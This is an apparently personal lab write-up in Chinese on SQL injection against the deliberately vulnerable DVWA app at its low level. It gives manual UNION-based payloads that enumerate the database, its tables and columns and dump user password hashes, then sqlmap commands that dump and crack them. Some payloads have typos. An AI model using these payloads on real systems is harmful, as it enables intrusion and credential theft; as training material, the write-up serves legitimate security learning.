前端外刊评论 2018-05-20
2018年5月16日
实验平台:win10+wamp+dvwa+sqlmap
实验内容:dvwa_low_SQL_Injection
实验过程:
第一步:配置实验环境
第二步:sql injection
1.‘ or ‘1’=’1’/*基于现有字段爆出所有信息,第一个撇用来闭合*/
2./*进行猜解字段数*/
1′ or 1=1 order by 1;#(查询成功)
1′ or 1=1 order by 2;#(查询成功)
1′ or 1=1 order by 3;#(查询失败,两个字段)
3./*获取当前数据库*/
1' union select 1,database();#(#注释掉后面的东西,mysql中查询当前数据库的命令 --select database();)
4./*获取数据库中的表*/
1’ union select 1,group_concat(table_name) from information _schema.tables where table_schema=database();#
5./*获取表中的字段名*/
1‘union select 1,group_concat(colum_name) from infor mation_schema.columns where table_name=’ users’;#
6./*下载数据*/
1’ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
第三步:sqlmap
注入神器
/*反馈需要登录cookie*/
sqlmap -u "url"
/*带上cookie参数*/
sqlmap -u "url" --cookie="cookie值”
/*获得所有的数据库*/
sqlmap -u "url" --cookie="cookie值” --dbs
/*获得指定数据库的所有表名单*/
sqlmap -u "url" --cookie="cookie值” -D dvwa --tables
/*获得指定表的字段名及相关信息*/
sqlmap -u "url" --cookie="cookie值” -D dvwa -T users --columns
/*对指定表的字段进行输出并且破解password的hash值*/
sqlmap -u "url" --cookie="cookie值” -D dvwa -T users -C user,password –dump
第四步:总结学习
打开这个wamp\www\dvwa\vulnerabilities\sqli\source目录,查看low.php的源码
看看渣渣级后台源码,这种码已是古董。